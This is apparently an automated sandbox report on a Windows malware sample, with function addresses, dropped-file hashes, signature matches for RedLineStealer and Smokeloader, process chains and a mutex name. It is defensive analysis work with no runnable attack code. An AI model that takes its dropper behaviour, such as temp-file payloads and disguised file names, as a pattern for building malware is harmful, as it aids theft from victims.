Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0040E96A	4_2_0040E96A
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0042EAD0	4_2_0042EAD0
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_00427A90	4_2_00427A90
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_00418A9F	4_2_00418A9F
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_00436CAF	4_2_00436CAF
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_00427D57	4_2_00427D57
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_00413EFB	4_2_00413EFB
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02138279	4_2_02138279
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0213ED37	4_2_0213ED37
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02124162	4_2_02124162
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_021376DB	4_2_021376DB
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0213D745	4_2_0213D745
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_021387B7	4_2_021387B7
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02137A4D	4_2_02137A4D
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0211EBD1	4_2_0211EBD1
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02126906	4_2_02126906
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0212397C	4_2_0212397C
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02146F16	4_2_02146F16
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02137FBE	4_2_02137FBE
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02137CF7	4_2_02137CF7
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02128D06	4_2_02128D06
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0213ED37	4_2_0213ED37
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00408880	7_2_00408880
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0040B2B0	7_2_0040B2B0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00419840	7_2_00419840
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00406850	7_2_00406850
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00427860	7_2_00427860
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00427070	7_2_00427070
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0043B870	7_2_0043B870
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00406000	7_2_00406000
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0043080E	7_2_0043080E
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0043F820	7_2_0043F820
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0041D0C0	7_2_0041D0C0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_004418A0	7_2_004418A0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0041194F	7_2_0041194F
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0043F150	7_2_0043F150
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0042B170	7_2_0042B170
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00403900	7_2_00403900
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00425100	7_2_00425100
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00439923	7_2_00439923
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00427133	7_2_00427133
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00433930	7_2_00433930
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_004121DB	7_2_004121DB
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0042A9F7	7_2_0042A9F7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0040E9B0	7_2_0040E9B0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0041825B	7_2_0041825B
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0042EA62	7_2_0042EA62
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0040CA62	7_2_0040CA62
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00442A60	7_2_00442A60
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0041DAD0	7_2_0041DAD0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00429ADE	7_2_00429ADE
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00425AF0	7_2_00425AF0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_004092A0	7_2_004092A0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00405AB0	7_2_00405AB0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_004042B0	7_2_004042B0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0043CB40	7_2_0043CB40
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0042EB5F	7_2_0042EB5F
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00408360	7_2_00408360
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00428B67	7_2_00428B67
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00437B69	7_2_00437B69
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00402B20	7_2_00402B20
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00441B20	7_2_00441B20
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00432B24	7_2_00432B24
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_004063C0	7_2_004063C0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0042DBF0	7_2_0042DBF0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00422380	7_2_00422380
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0041BBA0	7_2_0041BBA0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0042BBA0	7_2_0042BBA0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0042EBA1	7_2_0042EBA1
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0042EBB3	7_2_0042EBB3
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00441BB0	7_2_00441BB0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00441C40	7_2_00441C40
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00442470	7_2_00442470
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00426C76	7_2_00426C76
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0041D400	7_2_0041D400
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0041C400	7_2_0041C400
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00417405	7_2_00417405
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00414C20	7_2_00414C20
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00432426	7_2_00432426
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00428437	7_2_00428437
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0043443D	7_2_0043443D
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_004354C4	7_2_004354C4
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00434CEF	7_2_00434CEF
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0043A4EF	7_2_0043A4EF
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_004374AB	7_2_004374AB
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0041DCB0	7_2_0041DCB0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0043ACB0	7_2_0043ACB0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0042FCBC	7_2_0042FCBC
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0040D545	7_2_0040D545
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00425D6A	7_2_00425D6A
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00435D13	7_2_00435D13
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00442D20	7_2_00442D20
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0043CD27	7_2_0043CD27
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00420D90	7_2_00420D90
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0043C5A0	7_2_0043C5A0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00421E70	7_2_00421E70
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00436610	7_2_00436610
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00407620	7_2_00407620
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0040AE30	7_2_0040AE30
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0041F6D0	7_2_0041F6D0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00416ED0	7_2_00416ED0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0041BEE1	7_2_0041BEE1
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00402EF0	7_2_00402EF0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_004186FC	7_2_004186FC
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00423EFF	7_2_00423EFF
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00431E8E	7_2_00431E8E
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0041A690	7_2_0041A690
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00415720	7_2_00415720
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0041AF24	7_2_0041AF24
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00427F30	7_2_00427F30
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0040DFE2	7_2_0040DFE2
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_004257E0	7_2_004257E0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00429FE4	7_2_00429FE4
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0040CFEC	7_2_0040CFEC
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00409790	7_2_00409790
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_004427B0	7_2_004427B0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00441FB0	7_2_00441FB0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0212D253	7_2_0212D253
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0212E249	7_2_0212E249
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02126267	7_2_02126267
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0214A305	7_2_0214A305
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0213D327	7_2_0213D327
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0215F3B7	7_2_0215F3B7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_021473B2	7_2_021473B2
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02162017	7_2_02162017
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0212B097	7_2_0212B097
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_021460B7	7_2_021460B7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_021420D7	7_2_021420D7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_021520F5	7_2_021520F5
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02123157	7_2_02123157
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0213C148	7_2_0213C148
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02144166	7_2_02144166
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02148197	7_2_02148197
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0213B18B	7_2_0213B18B
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02126627	7_2_02126627
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0213D667	7_2_0213D667
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0213C667	7_2_0213C667
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0215268D	7_2_0215268D
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_021546A4	7_2_021546A4
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_021626D7	7_2_021626D7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02157712	7_2_02157712
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0215572B	7_2_0215572B
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0215A756	7_2_0215A756
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0212D7AC	7_2_0212D7AC
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02132442	7_2_02132442
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_021384C2	7_2_021384C2
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02124517	7_2_02124517
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02129507	7_2_02129507
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_021285C7	7_2_021285C7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_021425E7	7_2_021425E7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02162A17	7_2_02162A17
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02150A75	7_2_02150A75
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0215FA87	7_2_0215FA87
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02126AB7	7_2_02126AB7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02139AA7	7_2_02139AA7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0215BAD7	7_2_0215BAD7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02128AE7	7_2_02128AE7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02137AE4	7_2_02137AE4
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02123B67	7_2_02123B67
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02153B97	7_2_02153B97
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02159B8A	7_2_02159B8A
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02131BB6	7_2_02131BB6
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0215C807	7_2_0215C807
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02156877	7_2_02156877
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02127887	7_2_02127887
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0213A8F7	7_2_0213A8F7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0213F937	7_2_0213F937
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_021299F7	7_2_021299F7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0214EE1A	7_2_0214EE1A
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0214BE07	7_2_0214BE07
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0214EE08	7_2_0214EE08
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0214DE57	7_2_0214DE57
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02134E87	7_2_02134E87
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0215AF17	7_2_0215AF17
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0213DF17	7_2_0213DF17
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0214FF23	7_2_0214FF23
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02154F56	7_2_02154F56
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02155F7A	7_2_02155F7A
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02162F87	7_2_02162F87
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02140FF7	7_2_02140FF7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02137FFA	7_2_02137FFA
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0212EC17	7_2_0212EC17
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02162CC7	7_2_02162CC7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0212CCC9	7_2_0212CCC9
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0214ECC9	7_2_0214ECC9
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02125D17	7_2_02125D17
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0213DD37	7_2_0213DD37
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02122D87	7_2_02122D87
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02152D8B	7_2_02152D8B
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0215CDA7	7_2_0215CDA7
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02157DD0	7_2_02157DD0
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0214EDC6	7_2_0214EDC6

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe 9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe 9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94

Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: String function: 00414C10 appears 116 times
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: String function: 00408170 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: String function: 02134E77 appears 116 times
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: String function: 021283D7 appears 77 times
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: String function: 00410710 appears 53 times
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: String function: 0040FDA8 appears 125 times
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: String function: 02120977 appears 53 times
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: String function: 0040F8F9 appears 36 times
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: String function: 0212000F appears 121 times

Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7252 -s 1656

Source: NDWffRLk7z.exe

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: NDWffRLk7z.exe	Binary or memory string: OriginalFileName vs NDWffRLk7z.exe
Source: NDWffRLk7z.exe, 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs NDWffRLk7z.exe
Source: NDWffRLk7z.exe, 00000004.00000002.3743818688.0000000000400000.00000040.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs NDWffRLk7z.exe
Source: NDWffRLk7z.exe, 00000004.00000003.1311720126.0000000002180000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameScreenshoter.exeF vs NDWffRLk7z.exe

Source: NDWffRLk7z.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000007.00000002.1601705036.0000000000793000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.3752943059.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000007.00000002.1602257379.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.3748774798.000000000058A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: NDWffRLk7z.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ScreenUpdateSync[1].exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 89AC.tmp.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/7@11/3

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Code function: 4_2_0058B42E CreateToolhelp32Snapshot,Module32First,

4_2_0058B42E

Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe

Code function: 7_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

7_2_0043B870

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\track_prt[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7252
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Mutant created: \Sessions\1\BaseNamedObjects\5h48t4j4t1rr

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

File created: C:\Users\user\AppData\Local\Temp\89AC.tmp

Jump to behavior

Source: NDWffRLk7z.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: NDWffRLk7z.exe	Virustotal: Detection: 40%
Source: NDWffRLk7z.exe	ReversingLabs: Detection: 57%

Source: unknown	Process created: C:\Users\user\Desktop\NDWffRLk7z.exe "C:\Users\user\Desktop\NDWffRLk7z.exe"
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Process created: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe "C:\Users\user\AppData\Local\Temp\89AC.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7252 -s 1656
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Process created: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe "C:\Users\user\AppData\Local\Temp\89AC.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: windows.storage.dll	Jump to behavior
